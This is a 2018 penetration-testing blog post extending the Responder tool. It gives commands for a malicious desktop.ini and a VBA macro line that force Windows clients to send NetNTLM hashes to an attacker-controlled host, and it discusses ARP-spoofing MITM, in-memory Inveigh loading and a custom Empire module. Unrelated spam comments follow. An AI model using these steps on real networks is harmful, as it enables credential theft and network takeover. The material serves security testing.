A blog about generally interesting infosec stuff by employees of SecQuest Information Security https://www.secquest.co.uk

Tuesday, 10 July 2018

From Intermediate Responder to Advanced - Expanding the Suite

In our previous article we covered the tool Responder, and how to maximise its effectiveness by using the whole suite of tools and options provided to you. Responder is an incredibly useful network exploit tool and can be extremely powerful when LLMNR/NBNS are on and SMB signing is off. In this article, we will cover how to expand Responder's functionality using other tools in conjunction with it.
If you are not familiar with Responder already, we recommend you learn the basics and read our intermediate guide here: From Beginner Responder to Intermediate – Utilising the Whole Suite.

Expanding the Suite – Application Specific

When targeting specific applications you can increase the effectiveness of Responder significantly. For example; if you find a writeable SMB share on a network that is heavily used by clients and admins you can utilise that against the network with Responder. To do so you must first craft a malicious Desktop.ini file. Instructions are below:

Create the Desktop.ini file:
a.       Open a PowerShell window.
b.      Run mkdir <directory name>.
c.       Run attrib +s <directory name>.
d.      Enter the directory.
e.      Run echo [.ShellClassInfo] > desktop.ini.
f.        Run:
                                                               i.      For Windows Vista victim and above: echo IconResource=\\<Responder server IP>\directory >> desktop.ini.
                                                             ii.      For Windows XP victim: echo IconFile=\\<Responder server IP>\directory >> desktop.ini.
g.       Run attrib +s +h desktop.ini.

Check the contents of the file look like:
 [.ShellClassInfo]
IconResource=\\<Responder server IP>\directory
 

Once this is complete, you can place the desktop.ini file and the folder in which it is contained onto the writeable share. Any Windows clients connecting to the share with Windows Explorer will automatically attempt to resolve the icon of the folder; this will lead to a login attempt to your SMB module in Responder. If Responder is running and you have set the destination IP address correctly in the desktop.ini file you will be able to harvest the NetNTLM hash of anyone browsing to this SMB share. You can pair this technique with MultiRelay (usage discussed in previous article) for maximum effect, if domain admins use this share and SMB signing is off on the domain controller you will find it easy to conquer the entire network. If this is not the case, you will be able to use this to gain significant lateral spread and harvest some hashes for cracking while you are at it. Hash grabbing will work across subnets with this method. Shown below is an example of what the exploited SMB share should look like once you drop your malicious directory with desktop.ini inside.


Another example of an application specific attack would be using Microsoft Office macros. To create a malicious macro which will connect to your Responder server enter this VBS code into the macro:
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//<Responder server IP>/directory", 1)
You can then spread this Microsoft Office file however you see fit, if you can get an admin to open it you may be able to escalate your privileges or at least gain lateral spread and some more hashes for cracking!
These methods will also work across subnets, unlike LLMNR/NBNS hash grabbing in most scenarios. Responder naturally relies upon LLMNR and/or NBNS to direct victims to its fake servers for hash grabbing. These two protocols only operate on a single subnet/domain. By shedding reliance upon these protocols, we allow for hashes to be grabbed across subnets.
There are of course other application specific methods you can utilise; in general if you can force Windows to connect to Responder with NTLMSSP you will be able to get a hash as Windows will automatically hand over credentials. Methods such as the file:// resource locator in HTML are disabled in modern browsers, but there are plenty of other methods. This article: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ contains an impressive list of methods you could utilise against your target network. It also deserves credit for being my original inspiration for the desktop.ini method and has provided the creation steps for the two malicious files above.

Expanding the Suite – ARP Spoofing

Whilst Responder is a powerful tool, it is generally sat around waiting for victims to connect to it. This does decrease the speed of an attack a great deal, especially when targeting a specific machine. Additionally, Responder is unable to intercept correctly created SMB connections; it can only intercept connections that send LLMNR/NBNS broadcasts. If you are in a scenario where two SMB servers are syncing with each other using their Administrator accounts and you are aware of this, Responder would normally be unable to help you MITM this connection. With some extra help from an ARP spoofing attack this is possible!
The article at http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html contains a brief description of how to utilise ARP spoofing with Responder to MITM the aforementioned scenario. Laurent Gaffie's blog is a good source of information on Responder in general, should you require an explanation of the basics.

Expanding the Suite – Your Own Code

The Responder tool is under a GPL v3 license, which means you can do just about anything with the code so long as you ship it with the license and provide credit. For more details read this page: https://github.com/lgandx/Responder/blob/master/LICENSE. Thanks to this generous license we can take, adjust and use the Responder code as we see fit.
For example, I have adjusted the Responder code to work with Empire as a credential extraction module. The module takes the IP address of the Empire server as an argument and uses it to force the victim to connect back to Responder. You might assume that this is essentially redundant thanks to tools like Mimikatz, however; the main advantage of this module is that it does not require any privileged access, appears on the network as legitimate traffic and is virtually undetectable by AntiVirus as it is all standard Windows operation. By tricking Windows into handing over the NetNTLM hash for us we can still gather hashes for lateral spread and cracking when we don't have any privileges on our target machine. Installation is as easy as dropping the data and lib directories into the directory of your Empire installation. You can find the module here: https://www.secquest.co.uk/tools/HashGrabModule.zip
Since you can adapt and use the Responder code for your own purposes, advanced users will find that Responder is incredibly flexible. Responder's LLMNR and NBNS spoofing code could be utilised in a different application for example, or one of the individual servers could be used in something like the custom Empire module presented above.

Expanding the Suite – PowerShell and Pivoting

Whilst Responder is a powerful tool and can be used to pivot into target networks using a technique described here, <https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/> if you already have access to PowerShell on a victim you can use that victim to pivot your LLMNR and NBNS attacks into the target network. Inveigh is a tool much like Responder and is controlled in a very similar manner, however; Inveigh is written in PowerShell instead of Python. This makes Inveigh an excellent choice for pivoting into Windows networks. Using IEX Inveigh can be downloaded directly into RAM on the target machine and executed with a single command.
Inveigh can be found here: https://github.com/Kevin-Robertson/Inveigh
An excellent list of different ways to download Inveigh to a machine can be found here: https://gist.github.com/HarmJ0y/bb48307ffa663256e239
Inveigh operates in a very similar manner to Responder, and should be simple to use if you already know how to use Responder. It is worth bearing in mind that Inveigh has support for both privileged and unprivileged execution modes. If you have gained access to a machine under an unprivileged user, you may be able to use Inveigh to escalate your privileges. In conjunction with the application specific methods listed above, Inveigh pivoting can be a powerful and stealthy method of privilege escalation.

Summary

As you can see, Responder can become an extremely flexible and powerful tool when used to its full potential. Our intermediate guide covered the usage of what was provided, and this article has covered how you can expand upon those tools. By no means are the above the only ways to expand Responder, I highly encourage you to seek out your own methods. If you discover any new and interesting ways of adapting Responder to a specific network I would love to hear about them. Additionally, if you have any questions regarding Responder I would be happy to answer them, you can contact me at: lewis@secquest.co.uk.

15 comments:

  1. In addition to the fact that there is no expectation for the future, there is nothing confident right now except for taking in and out the hopelessness they feel. It seems to them like the enduring will endure forever. Specialists who work with dietary how to cure anxiety disorder problems should be ready for the surge of sadness that spills out once the dietary issue side effects and examples have been settled or restricted somewhat.

    ReplyDelete
  2. You might have to see the value in the way that fostering a successful social showcasing methodology can be a major test particularly when yours is an independent company. This is the point at which Sell excess stock
    the help of a web-based entertainment advertising organization becomes important. In spite of the fact that there are many such organizations, you want to embrace cautious quest for the right organization fit for fostering a viable advertising system.

    ReplyDelete
  3. Favored Provider Organizations - This is charged in an expense for-administration premise. The elaborate medical care suppliers are paid by the safety net provider on an arranged charge and timetable. The expense of administrations are possible lower assuming that the approach holder picks an out-of-network supplier advertisement by and large expected to Adeslas pay the contrast between what the supplier charges and what the medical coverage plan needs to pay.

    ReplyDelete
  4. There are a few stages viewed as the juggernauts at this moment, yet recollect the times of AOL, MySpace and eBay Could you enlist a virtual entertainment administrator who pitched connecting with your I.T instagram likes kaufen clients on MySpace I question it. The fact is that the social scene is dynamic and a virtual entertainment director ought to be continually assessing new stages and making proposals to you on whether they are appropriate for you to investigate.

    ReplyDelete
  5. Soccer has advanced toward the U.S. also, as in other more affluent nations like those in Europe, the round of soccer has turned into an soccer camp tulsa incredible speculation of time and cash. Children of any age play soccer from age five up through secondary school and school. Grown-up diversion soccer associations are likewise well known.

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. This comment has been removed by the author.

    ReplyDelete
  8. The Association was started in early 2020 by Marci Dickerson and Sumer Rose Nolan — of The Game I and II, Dickerson’s Catering and Nolan's SRN Financial Services. The goal of the group is to provide women a place to network and gain quality [url=http://www.womensexpansion.com/]professional development for businesswomen[/url] development guidance

    ReplyDelete
  9. Romeo, who is already showing signs of following in his father's footballing footsteps by playing for Inter [url=https://www.thebestprogram.net/]fort lauderdale anti aging clinic[/url]Miami CF II as a forward, sported the team's pale pink kit as he took prime front-row seat at the game

    ReplyDelete
  10. Cardio preparing or vigorous activity is any movement that utilizes the utilization of extensively huge gatherings of muscles in a ceaseless and cadenced way all Cardio Training through specific timeframes. The most well-known instances of which are running, skiing, skating, running, tae bo, circular preparation, strolling, paddling, and trekking.

    ReplyDelete
  11. It is prudent to counsel a hair specialist prior to taking up this plan on the grounds that miniature plaits doesn't endure longer in dry or fragile braids.Unique of African societies, the Afro plait did substantially more human hair braided wigs than a hair trimming. The hair styling could distinguish somebody's social position or even uncover the accessibility for marriage.

    ReplyDelete
  12. Baitcasting Reels: I like to have my stuff apportion around 5.1:1 also and for similar reasons. These reels are incredible for Survival games heavier line, 20-pound are more. They additionally work better with heavier lure. They get less knot in light of their plan.

    ReplyDelete
  13. All in all, in the event that you can observe these astonishing eye drops you ought to utilize them. They will add a little shimmer and clearness to your face that will daze everybody you meet. On the off chance that a first eye drops for appearance can represent the deciding moment you, shouldn't you look the best you can.

    ReplyDelete
  14. A flat out gain in one component, nonetheless, may be better used by lessening the commitment from another all the more exorbitant component. For instance, on the off chance that a more productive http://blog.secquest.co.uk/2018/07/from-intermediate-responder-to-advanced.html#comment-formwarming strategy were found, either hotness could be kept up with at the ongoing level for a lower cost OR hotness could be expanded for a similar expense.

    ReplyDelete
  15. f you can't differentiate between game birds and different species then you truly don't have a place in the field. A moral wingshooter just shoots whenever he has distinguished his prey. One can pardon the tracker confounded by a partridge and http://blog.secquest.co.uk/2018/07/from-intermediate-responder-to-advanced.html#comment-formfrancolin as from a distance they basically appear to be identical. However, in saying that a wingshooter should really try to get familiar with the various species. To shoot the ranchers extraordinarily safeguarded blue cranes or some other uniquely safeguarded birds might have serious outcomes.

    ReplyDelete